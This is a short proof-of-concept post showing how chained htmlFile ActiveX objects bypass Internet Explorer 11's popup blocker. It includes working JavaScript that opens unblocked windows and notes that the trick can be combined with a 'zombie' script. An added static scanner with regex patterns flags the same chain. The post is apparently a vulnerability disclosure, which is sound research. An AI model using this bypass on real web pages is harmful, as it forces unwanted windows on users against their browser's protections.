Popup Blocker bypass on Microsoft Internet Explorer
Destroyed htmlFile

PROOF OF CONCEPT

Using a small variation of the technique described in the zombie alert, we can completely bypass the popUp blocker. In fact, this bypass can be combined with the zombie script, so we can throw popUps with no restrictions while the user is navigating on Google or any other site!
If you don't have Internet Explorer, watch this Video PoC.



<iframe></iframe>

// Create an htmlFile from an IFrame
var ax1 = new window[0].ActiveXObject("htmlFile");

// Destroy the contents of the IFrame, while keeping ax1 alive
// because we have a reference to it outside the IFrame itself.

window[0].document.open().close();

ax1.open().close(); // Initialize the htmlFile

// Create a new htmlFile inside the previous one
var ax2 = new ax1.Script.ActiveXObject("htmlFile");
ax2.open().close(); // Initialize the htmlFile

// Done! Its window.open method can't be seen by the popUp blocker
for (var i=0; i<5; i++)
{
    ax2.Script.open("https://www.twitter.com","WIN","width=250,height=250");
}


Tested on: IE11 [ Win7 | Win10 fully updated 2017/05/18 ]
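
A defensive counterpart to the PoC, as an added example that is not part of the original post: a static check that a content filter or code-review script could run over page script to flag the htmlFile chain used above. The indicator ids, verdict names and sample strings are assumptions of this sketch.

```javascript
// Added example: static heuristic for the htmlFile chain shown in the PoC.
// Indicator ids and verdict names are assumptions made for this sketch.
const INDICATORS = [
  { id: "htmlfile-activex", re: /ActiveXObject\s*\(\s*["']htmlFile["']\s*\)/i },
  { id: "nested-script-activex", re: /\.\s*Script\s*\.\s*ActiveXObject\s*\(/ },
  { id: "script-open-call", re: /\.\s*Script\s*\.\s*open\s*\(/ },
  { id: "document-reset", re: /\.\s*document\s*\.\s*open\s*\(\s*\)\s*\.\s*close\s*\(/ },
];

// Strip // and /* */ comments but keep string literals, so "https://..."
// is not cut. Regex literals and template strings are not handled.
function stripComments(src) {
  let out = "", i = 0, quote = null;
  while (i < src.length) {
    const c = src[i], next = src[i + 1];
    if (quote) {
      if (c === "\\") { out += c + (next || ""); i += 2; continue; }
      if (c === quote) quote = null;
      out += c; i++;
    } else if (c === '"' || c === "'") {
      quote = c; out += c; i++;
    } else if (c === "/" && next === "/") {
      while (i < src.length && src[i] !== "\n") i++;
    } else if (c === "/" && next === "*") {
      const end = src.indexOf("*/", i + 2);
      i = end === -1 ? src.length : end + 2;
    } else { out += c; i++; }
  }
  return out;
}

// "suspicious" needs the htmlFile object plus a call routed through .Script
function scanScript(src) {
  const code = stripComments(src);
  const hits = INDICATORS.filter((x) => x.re.test(code)).map((x) => x.id);
  const viaScript = hits.includes("nested-script-activex") || hits.includes("script-open-call");
  if (!hits.includes("htmlfile-activex")) return { hits, verdict: "clean" };
  return { hits, verdict: viaScript ? "suspicious" : "review" };
}

// Constructed samples; example.test is a placeholder host.
const POC_LIKE = [
  'var ax1 = new window[0].ActiveXObject("htmlFile");',
  "window[0].document.open().close();",
  'var ax2 = new ax1.Script.ActiveXObject("htmlFile");',
  'ax2.Script.open("https://example.test", "WIN", "width=250,height=250");',
].join("\n");
const BENIGN = '// old: ActiveXObject("htmlFile")\nwindow.open("https://example.test/help", "HELP");';
console.log(scanScript(POC_LIKE).verdict, scanScript(BENIGN).verdict);
```

A plain `ActiveXObject("htmlFile")` with no `.Script` call is reported as "review" rather than "suspicious", since the object alone does not show the nested-window pattern.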

Thanks to my friend Gareth, for helping me to make a clearer PoC.
Thanks to my friend Alex, for helping me to make it work in Win7.

Questions? Tweet me here: @magicmac2000